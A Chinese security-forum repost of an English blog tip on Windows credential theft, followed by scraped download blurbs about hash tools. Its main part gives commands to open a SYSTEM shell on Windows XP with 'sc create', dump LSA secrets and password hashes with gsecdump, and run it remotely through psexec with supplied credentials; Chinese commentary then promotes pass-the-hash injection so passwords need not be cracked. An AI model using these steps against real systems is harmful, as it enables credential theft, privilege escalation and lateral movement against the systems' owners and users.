文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
下载网址:
http://www.truesec.com/PublicSto ... tectCookieSupport=1
To get a DOS Prompt as NT system:
C:/>sc create shellcmdline binpath= "C:/WINDOWS/system32/cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:/>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:/>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:/WINDOWS/system32>whoami
NT AUTHORITY/SYSTEM
C:/WINDOWS/system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com
C:/>psexec //COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx
分享到:
相关推荐
从注册表导取Windows-hash方法-到-远程HASH注入.docx
这是清华大学王老师报告PPT,介绍了密码HASH函数上研究的最新成果
基于Hash锁的RFID SQL注入攻击防御方法.pdf
我自已所架的模拟环境中测试过,在满足上面三个条情的情况下面才能够进行HASH注入攻击。 如果我们仅仅的是拥有一个以system权限值行的mssql进行内网渗透的话,完全没办法利用hash攻击;或者是我们用windows RPC溢出...
Geohash编码抗k近邻攻击的脆弱性分析.docx
注入系统进程,进行降权,获取HASH值。
比如我们注入出数据库的hash,但是没办法拿到webshell 我们可以使用mysql_hash,用hash登陆并控制数据库 使用方法: mysql_hash.exe -u root -p Enter password: ***************************************** 其中1....
uthash开源的hash函数实现,里面的uthash.h可用
啊D注入工具 v2.32 无限制版带Hash验证无后门版
uthash 是C的比较优秀的开源代码,它实现了常见的hash操作函数,例如查找、插入、删除等待。该套开源代码采用宏的方式实现hash函数的相关功能,支持C语言的任意数据结构最为key值,甚至可以采用多个值作为key,无论...
内容描述:用于crypto中hash爆破的强大工具。 优势:相较于其他hash工具,具有更快的算力,使用方便简洁。 适用:适用于md5,sha256等典型hash加密方式,反推出所需的源码。
stm32f407平台上实现的hash算法
MurmurHash算法由Austin Appleby创建于2008年,现已应用到Hadoop、libstdc 、nginx、libmemcached,Redis,Memcached,Cassandra,HBase,Lucene等开源系统。2011年Appleby被Google雇佣,随后Google推出其变种的...
这可以防止 DOS 攻击,其中攻击者发送大量哈希冲突的项目,这些项目被用作哈希映射中的键。 这也避免了通过从一个映射读取并写入另一个映射来意外的二次行为。 目标和非目标 AHash的输出没有固定的标准。这允许它...
RS-Hash Function Value: " + ghl.RSHash(key)); System.out.println(" 2. JS-Hash Function Value: " + ghl.JSHash(key)); System.out.println(" 3. PJW-Hash Function Value: " + ghl.PJWHash(key)); System....
Hashcat is the self-proclaimed world's fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software. Versions are available for Linux, OS X, and ...
3维hashin失效准则~复合材料层合板
hashcat is the world’s fastest and most advanced password recovery tool. This version combines the previous CPU-based hashcat (now called hashcat-legacy) and GPU-based oclHashcat. Hashcat is ...
217种hashcat-V3.0所支持的哈希 举例,如md4、md5、sha1、sha256,部分特殊哈希的例子有官网说明的链接。